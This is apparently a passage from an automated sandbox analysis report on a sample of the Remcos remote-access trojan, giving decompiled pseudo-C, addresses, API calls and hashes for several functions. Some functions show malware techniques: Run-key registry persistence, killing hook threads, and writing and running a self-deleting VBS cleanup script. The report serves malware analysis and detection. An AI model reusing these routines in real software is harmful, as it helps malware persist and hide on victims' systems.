					_t103 = 0x30;
					L00401EDA( &_a4, 0x30, _t111, E004179B3( &_v28, 0x30, _t63));
					L00401ED0();
				}
				_t25 = L00402469();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(L00401ECB( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402064(_t67, _t114 - 0x18, 0x45f6ac);
						_push(0xa8);
						L00404A6E(_t67, 0x46ca00, _t103, __eflags);
					}
				} else {
					_t60 = L00401ECB( &_a4);
					_t118 = _t114 - 0x18;
					E004020CC(_t67, _t118, _t103, _t120, _t109);
					L004173A6(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = L00416C32( &_v124, _t67);
					_t108 = E00403010( &_v28, E00403086(_t67,  &_v76, L00409E6B( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E00403086(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					L00401ED0();
					L00401ED0();
					L00401ED0();
					L00401ED0();
					mciSendStringW(L00401ECB( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00402064(0, _t114 - 0x18, 0x45f6ac);
					_push(0xa9);
					L00404A6E(0, 0x46ca00, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46bea8 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x46bea6; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x46bea6 = 0;
							}
							__eflags =  *0x46bea5; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x46bea5 = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x46bea8);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x46bea8; // 0x0
							} else {
								CloseHandle( *0x46bea8);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402064(0, _t115 - 0x18, 0x45f6ac);
						_push(0xaa);
						L00404A6E(0, 0x46ca00, _t108, _t122);
						L00401ED0();
						goto L21;
					}
				}
				L21:
				return L00401ED0();
			}
























                              0x0041636b
                              0x00416375
                              0x00416377
                              0x00416385
                              0x0041638a
                              0x00416390
                              0x0041639f
                              0x004163a7
                              0x004163a7
                              0x004163ae
                              0x004163b6
                              0x004163b8
                              0x004164a5
                              0x004164a7
                              0x00000000
                              0x004164ad
                              0x004164b7
                              0x004164bc
                              0x004164c6
                              0x004164c6
                              0x004163be
                              0x004163be
                              0x004163c3
                              0x004163cb
                              0x004163d2
                              0x004163d7
                              0x004163da
                              0x004163e4
                              0x00416417
                              0x0041641c
                              0x00416425
                              0x0041642d
                              0x00416435
                              0x0041643d
                              0x00416450
                              0x00416464
                              0x00416466
                              0x00416470
                              0x00416475
                              0x0041647f
                              0x00416489
                              0x0041648f
                              0x0041648f
                              0x0041648f
                              0x00416560
                              0x00416560
                              0x00416562
                              0x00000000
                              0x00000000
                              0x004164d0
                              0x004164d6
                              0x004164e0
                              0x004164e2
                              0x004164e2
                              0x004164e8
                              0x004164ee
                              0x004164f8
                              0x004164fa
                              0x004164fa
                              0x0041650c
                              0x0041650e
                              0x00416511
                              0x00416516
                              0x00416518
                              0x0041651c
                              0x0041651f
                              0x00000000
                              0x00000000
                              0x00416521
                              0x00416522
                              0x00416525
                              0x00000000
                              0x00416527
                              0x0041652d
                              0x0041652d
                              0x00000000
                              0x00416525
                              0x00416544
                              0x00416546
                              0x0041655b
                              0x00416548
                              0x0041654e
                              0x00416554
                              0x00000000
                              0x00416554
                              0x00416546
                              0x00416570
                              0x0041657a
                              0x00416586
                              0x0041658b
                              0x00416595
                              0x0041659d
                              0x00000000
                              0x0041659d
                              0x0041648f
                              0x004165a2
                              0x004165b0

                              APIs
                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416450
                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416464
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6AC), ref: 00416489
                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 0041649F
                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 004164E0
                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 004164F8
                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041650C
                              • SetEvent.KERNEL32 ref: 0041652D
                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041653E
                              • CloseHandle.KERNEL32 ref: 0041654E
                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416570
                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041657A
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                              • API String ID: 738084811-1354618412
                              • Opcode ID: a648e62bf9a57e1a7cf6fa9e7c23b293d4edcd21ed1639a470945636812c86c5
                              • Instruction ID: c8fb6d8f14581896d3eba004d9fbc9f1a09e24d5ac4ccc55cdd35aae18883956
                              • Opcode Fuzzy Hash: a648e62bf9a57e1a7cf6fa9e7c23b293d4edcd21ed1639a470945636812c86c5
                              • Instruction Fuzzy Hash: 4C51B4716002087AD714BB75DC96DFF3A6DDA50389F14003FF501A61E2EE788E8586AE
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040B107, Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 259registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 98%
                              			E0040B107() {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				short _v668;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t231;

				L0040FB4B();
				if( *0x46a9d4 != 0x30) {
					L00409D75();
				}
				_t227 =  *0x46bd6b - 1; // 0x0
				if(_t227 == 0) {
					L00414D1D(_t227);
				}
				if( *0x46ba75 != 0) {
					E004170AC(L00401ECB(0x46c0e0));
				}
				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t229 =  *0x46bb06 - 1; // 0x1
				if(_t229 == 0) {
					L0041074C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401ECB(0x46c4e8));
				}
				_t230 =  *0x46baff - 1; // 0x0
				if(_t230 == 0) {
					L0041074C(0x80000002, _t214, L00401ECB(0x46c4e8));
				}
				_t231 =  *0x46bb04 - 1; // 0x0
				if(_t231 == 0) {
					L0041074C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401ECB(0x46c4e8));
				}
				L00431810(0,  &_v668, 0, 0x208);
				_t49 = L00402469();
				_t50 = L00401F75(0x46c560);
				_t53 = L00410420(L00401F75(0x46c518), "exepath",  &_v668, 0x208, _t50, _t49);
				_t232 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v668, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F75(0x46c518));
				_t56 = L004074E6(_t232);
				_t233 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(L00401ECB(0x46c530), 0x80);
				}
				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
				asm("sbb bl, bl");
				E00403086(_t123,  &_v148, L00416C32( &_v76, L004169EB( &_v28)), 0, _t233, L".vbs");
				L00401ED0();
				L00401FA7();
				L00404409(_t123,  &_v124, E00403086(_t123,  &_v28, E0040425F(_t123,  &_v76, E0043918F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
				L00401ED0();
				L00401ED0();
				E004043E5(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040425F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401ED0();
				_t124 = _t123 & 0x00000001;
				_t234 = _t124;
				if(_t124 != 0) {
					E004032F1(E00403086(_t124,  &_v28, E004043E5(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040425F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
					L00401ED0();
					L00401ED0();
					L00401ED0();
				}
				E004032F1(E00403086(_t124,  &_v100, E00403086(_t124,  &_v28, E0040425F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t235 = _t124;
				if(_t124 != 0) {
					L0040766E(_t124,  &_v52, 0, L"wend\n");
				}
				_t82 = L004074E6(_t235);
				_t236 = _t82;
				if(_t82 != 0) {
					E004032F1(E00403086(0x45f714,  &_v100, L00409E6B( &_v28, L"fso.DeleteFolder \"", _t236, 0x46c530), 0, _t236, L"\"\n"));
					L00401ED0();
					L00401ED0();
				}
				L0040766E(0x45f714,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = L00401ECB( &_v124);
				_t85 = L00402469();
				if(E0041729F(L00401ECB( &_v52), _t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, L"open", L00401ECB( &_v124), 0x45f714, 0x45f714, 0);
				}
				ExitProcess(0);
			}























                              0x0040b113
                              0x0040b11f
                              0x0040b121
                              0x0040b121
                              0x0040b129
                              0x0040b12f
                              0x0040b131
                              0x0040b131
                              0x0040b13d
                              0x0040b14b
                              0x0040b14b
                              0x0040b155
                              0x0040b15a
                              0x0040b160
                              0x0040b171
                              0x0040b176
                              0x0040b177
                              0x0040b17d
                              0x0040b18e
                              0x0040b193
                              0x0040b194
                              0x0040b19a
                              0x0040b1ae
                              0x0040b1b3
                              0x0040b1c4
                              0x0040b1d3
                              0x0040b1db
                              0x0040b1fc
                              0x0040b204
                              0x0040b206
                              0x0040b211
                              0x0040b211
                              0x0040b224
                              0x0040b236
                              0x0040b241
                              0x0040b243
                              0x0040b252
                              0x0040b252
                              0x0040b267
                              0x0040b26e
                              0x0040b287
                              0x0040b290
                              0x0040b298
                              0x0040b2cd
                              0x0040b2d6
                              0x0040b2de
                              0x0040b2f9
                              0x0040b302
                              0x0040b307
                              0x0040b307
                              0x0040b30a
                              0x0040b33e
                              0x0040b346
                              0x0040b34e
                              0x0040b356
                              0x0040b356
                              0x0040b38e
                              0x0040b396
                              0x0040b39e
                              0x0040b3a6
                              0x0040b3ab
                              0x0040b3ad
                              0x0040b3b7
                              0x0040b3b7
                              0x0040b3ca
                              0x0040b3cf
                              0x0040b3d1
                              0x0040b3f6
                              0x0040b3fe
                              0x0040b406
                              0x0040b406
                              0x0040b413
                              0x0040b41c
                              0x0040b425
                              0x0040b443
                              0x0040b457
                              0x0040b457
                              0x0040b45e

                              APIs
                                • Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,0046C500,0040D57C), ref: 0040FB5B
                                • Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF), ref: 0040FB6E
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,0046C518,0046C500), ref: 0040B211
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B224
                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040B252
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040B260
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(0040884D,00000000,0046C500,0040B126,?,0046C518,0046C500), ref: 00409D84
                                • Part of subcall function 00409D75: UnhookWindowsHookEx.USER32(00000000), ref: 00409D94
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(00408832,00000000,?,0046C518,0046C500), ref: 00409DA6
                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B457
                              • ExitProcess.KERNEL32 ref: 0040B45E
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: ")$.vbs$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                              • API String ID: 3659626935-3677834288
                              • Opcode ID: 567856cb0eac3085822269a09f1429d21f775a8f17a796a089890433db4e469b
                              • Instruction ID: 1fdbb4419d14362d38d1ed4744bf8d6dc0aba1f6708a8cbb9b41b7a1a16d8b70
                              • Opcode Fuzzy Hash: 567856cb0eac3085822269a09f1429d21f775a8f17a796a089890433db4e469b
                              • Instruction Fuzzy Hash: 86819D31A101086ACB14F7A2DCA69EF77699F50748F14003FF506772E2EE785E8A869D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044625D, Relevance: 27.4, APIs: 18, Instructions: 419COMMON
                              Download Yara Rule
                              C-Code - Quality: 87%
                              			E0044625D(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = L00434870(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(L00439E14())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x46b4d0; // 0x2ea9f60
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x46b4dc; // 0x2ea9f60
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x46b4d0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = L00446905(_t298);
												L0043EE85(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										L0043EE85( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = L00446905(_t298);
											L0043EE85(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x46b4d0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = L0043DFD9(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												L0043EE85(_t300);
												goto L12;
											} else {
												_t131 = L004405A6(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0043629A();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = L00450867(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(L00439E14())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x46b4d4; // 0x2ebce48
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x46b4d8; // 0x2ebcfa8
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x46b4d4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = L00446898(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = L00446905(_t302);
																					L0043EE85(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			L0043EE85( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = L00446905(_t302);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x46b4d4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = L0043DFD9(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					L0043EE85(_t304);
																					goto L56;
																				} else {
																					_t148 = E00440264(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0043629A();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t305 = L0043DFD9(_t260, _t260 + 1, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								L0043E5DA(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									L0043EE85(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t284 = _t271 + 1;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_v16 = _t262 + 1;
																										 *(_t221 + _t290) = L0043DFD9(_t262, _t262 + 1, 1);
																										L0043EE85(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = L004405A6( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0043629A();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t306 = L0043DFD9(_t263, _t263 + 1, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														L0043E5DA(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															L0043EE85(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t284 = _t267 + 2;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_v24 = (_t267 - _t284 >> 1) + 1;
																																 *(_t223 + _t291) = L0043DFD9(_t267 - _t284 >> 1, (_t267 - _t284 >> 1) + 1, 2);
																																L0043EE85(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E00440264( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0043629A();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x46b4d0;
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E00443141(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = L00439E14();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x46b4d0; // 0x2ea9f60
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x46b4d4 = L0043DFD9(_t246, 1, 4);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x46b4d0 = L0043DFD9(_t246, 1, 4);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x46b4d0 - _t221; // 0x2ea9f60
